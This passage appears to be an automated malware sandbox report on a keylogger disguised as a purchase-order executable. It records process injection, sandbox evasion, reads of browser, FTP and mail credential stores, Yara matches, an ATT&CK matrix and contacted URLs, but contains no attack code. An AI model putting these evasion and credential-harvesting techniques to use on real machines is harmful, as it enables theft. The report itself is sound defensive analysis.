Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE 'C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE'
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process created: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process created: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: PURCHASE ORDER E3007921.EXE

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: PURCHASE ORDER E3007921.EXE

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: C:\Users\AMD RYZEN 3\Desktop\calmclientandserver\obj\Debug\IsolatedStorage.pdb source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.662061739.0000000003839000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected Beds Obfuscator

Show sources

Source: Yara match	File source: 00000000.00000002.661938315.00000000028FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.920165617.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.662061739.0000000003839000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.661917531.00000000028D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.662191831.00000000038BA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PURCHASE ORDER E3007921.EXE PID: 7024, type: MEMORY
Source: Yara match	File source: Process Memory Space: PURCHASE ORDER E3007921.EXE PID: 6848, type: MEMORY
Source: Yara match	File source: 0.2.PURCHASE ORDER E3007921.EXE.28ddd68.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PURCHASE ORDER E3007921.EXE.28ddd68.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PURCHASE ORDER E3007921.EXE.38ba990.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PURCHASE ORDER E3007921.EXE.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PURCHASE ORDER E3007921.EXE.3839530.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PURCHASE ORDER E3007921.EXE.38ba990.5.raw.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 0_2_00452050 push esi; iretd		0_2_00452ABB
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Code function: 3_2_004F2050 push esi; iretd		3_2_004F2ABB

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected Beds Obfuscator

Show sources

Source: Yara match	File source: 00000000.00000002.661938315.00000000028FD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.920165617.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.662061739.0000000003839000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.661917531.00000000028D6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.662191831.00000000038BA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PURCHASE ORDER E3007921.EXE PID: 7024, type: MEMORY
Source: Yara match	File source: Process Memory Space: PURCHASE ORDER E3007921.EXE PID: 6848, type: MEMORY
Source: Yara match	File source: 0.2.PURCHASE ORDER E3007921.EXE.28ddd68.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PURCHASE ORDER E3007921.EXE.28ddd68.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PURCHASE ORDER E3007921.EXE.38ba990.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PURCHASE ORDER E3007921.EXE.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PURCHASE ORDER E3007921.EXE.3839530.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PURCHASE ORDER E3007921.EXE.38ba990.5.raw.unpack, type: UNPACKEDPE

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE TID: 6892	Thread sleep count: 91 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE TID: 6908	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE TID: 6868	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.663905890.00000000058D0000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.661682757.0000000000CAA000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll3
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.663905890.00000000058D0000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.663905890.00000000058D0000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: PURCHASE ORDER E3007921.EXE, 00000000.00000002.663905890.00000000058D0000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

Code function: 3_2_05F72D50 LdrInitializeThunk,

3_2_05F72D50

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

Memory written: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE base: 400000 value starts with: 4D5A

Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

Process created: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

Jump to behavior

Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.920904825.0000000001230000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.920904825.0000000001230000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.920904825.0000000001230000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: PURCHASE ORDER E3007921.EXE, 00000003.00000002.920904825.0000000001230000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Queries volume information: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Queries volume information: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Snake Keylogger

Show sources

Source: Yara match	File source: 00000003.00000002.920165617.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.662061739.0000000003839000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.662191831.00000000038BA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PURCHASE ORDER E3007921.EXE PID: 7024, type: MEMORY
Source: Yara match	File source: Process Memory Space: PURCHASE ORDER E3007921.EXE PID: 6848, type: MEMORY
Source: Yara match	File source: 0.2.PURCHASE ORDER E3007921.EXE.38ba990.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PURCHASE ORDER E3007921.EXE.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PURCHASE ORDER E3007921.EXE.3839530.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PURCHASE ORDER E3007921.EXE.38ba990.5.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies			Jump to behavior
Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Tries to harvest and steal ftp login credentials

Show sources

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Users\user\Desktop\PURCHASE ORDER E3007921.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Yara match	File source: 00000003.00000002.920981561.0000000002841000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PURCHASE ORDER E3007921.EXE PID: 7024, type: MEMORY

Remote Access Functionality:

Yara detected Snake Keylogger

Show sources

Source: Yara match	File source: 00000003.00000002.920165617.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.662061739.0000000003839000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.662191831.00000000038BA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PURCHASE ORDER E3007921.EXE PID: 7024, type: MEMORY
Source: Yara match	File source: Process Memory Space: PURCHASE ORDER E3007921.EXE PID: 6848, type: MEMORY
Source: Yara match	File source: 0.2.PURCHASE ORDER E3007921.EXE.38ba990.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.PURCHASE ORDER E3007921.EXE.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PURCHASE ORDER E3007921.EXE.3839530.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PURCHASE ORDER E3007921.EXE.38ba990.5.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection112	Masquerading1	OS Credential Dumping2	Security Software Discovery1	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Disable or Modify Tools1	Input Capture1	Process Discovery2	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion21	Security Account Manager	Virtualization/Sandbox Evasion21	SMB/Windows Admin Shares	Archive Collected Data1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection112	NTDS	Remote System Discovery1	Distributed Component Object Model	Data from Local System2	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	System Network Configuration Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing1	Cached Domain Credentials	System Information Discovery13	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
PURCHASE ORDER E3007921.EXE	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.2.PURCHASE ORDER E3007921.EXE.400000.0.unpack	100%	Avira	TR/Spy.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://freegeoip.app/xml/	0%	URL Reputation	safe
https://freegeoip.app/xml/	0%	URL Reputation	safe
https://freegeoip.app/xml/	0%	URL Reputation	safe
http://checkip.dyndns.org/	0%	Avira URL Cloud	safe
https://freegeoip.app/xml/84.17.52.78x	0%	URL Reputation	safe
https://freegeoip.app/xml/84.17.52.78x	0%	URL Reputation	safe
https://freegeoip.app/xml/84.17.52.78x	0%	URL Reputation	safe
http://cdn.discordapp.com4Tkp~	0%	Avira URL Cloud	safe
http://checkip.dyndns.org/HB	0%	Avira URL Cloud	safe
https://freegeoip.app	0%	URL Reputation	safe
https://freegeoip.app	0%	URL Reputation	safe
https://freegeoip.app	0%	URL Reputation	safe
http://checkip.dyndns.orgD8Tk	0%	Avira URL Cloud	safe
http://checkip.dyndns.org	0%	Avira URL Cloud	safe
https://cdn.discordapp.com4Tk	0%	Avira URL Cloud	safe
https://freegeoip.app4Tk	0%	Avira URL Cloud	safe
